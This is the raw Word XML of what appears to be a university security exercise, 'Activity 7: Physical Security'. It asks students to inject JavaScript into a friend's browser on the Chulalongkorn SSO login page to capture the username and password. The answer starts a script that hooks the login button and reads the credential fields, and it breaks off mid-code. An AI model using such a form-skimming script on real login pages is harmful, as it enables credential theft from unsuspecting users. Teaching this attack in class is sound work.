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0E50A" w14:textId="6D8BF99A" w:rsidR="00CF6C7F" w:rsidRPr="00466CEC" w:rsidRDefault="00CF6C7F" w:rsidP="00CF6C7F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Activity </w:t>
      </w:r>
      <w:r w:rsidR="006C5A98">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Physical Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF863AC" w14:textId="3914B571" w:rsidR="00CF6C7F" w:rsidRPr="00466CEC" w:rsidRDefault="00CF6C7F" w:rsidP="00CF6C7F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Exercise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468E724E" w14:textId="1A1D652D" w:rsidR="00CF6C7F" w:rsidRPr="00466CEC" w:rsidRDefault="00CF6C7F" w:rsidP="00CF6C7F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1. Javascript Injection. Your friend has just logged out of ChulaSSO (https://account.it.chula.ac.th/) before leaving his/her computer. You have 2-3 minutes to inject a script to his/her browser so that you can steal his/her username (ChulaId) and password. For this class, please inject a javascript so that once your friend login (clicks the login button), it will pop up his/her username/password.</w:t>
      </w:r>
      <w:r w:rsidR="00654C73" w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00654C73" w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Ans:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408DCB82" w14:textId="77777777" w:rsidR="00746010" w:rsidRPr="00746010" w:rsidRDefault="00746010" w:rsidP="0072124E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:spacing w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>let</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>btn</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>document</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>getElementsByTagName</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="E5C07B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"button"</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>)[</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC51977" w14:textId="77777777" w:rsidR="00746010" w:rsidRPr="00746010" w:rsidRDefault="00746010" w:rsidP="00746010">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:spacing w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>btn</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.onclick</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166E988A" w14:textId="77777777" w:rsidR="00746010" w:rsidRPr="00746010" w:rsidRDefault="00746010" w:rsidP="00746010">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:spacing w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>let</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>document</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>getElementById</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="E5C07B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"basic_username"</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>).value</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDEA35A" w14:textId="77777777" w:rsidR="00746010" w:rsidRPr="00746010" w:rsidRDefault="00746010" w:rsidP="00746010">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:spacing w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>let</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>document</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>getElementById</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="E5C07B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"basic_password"</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
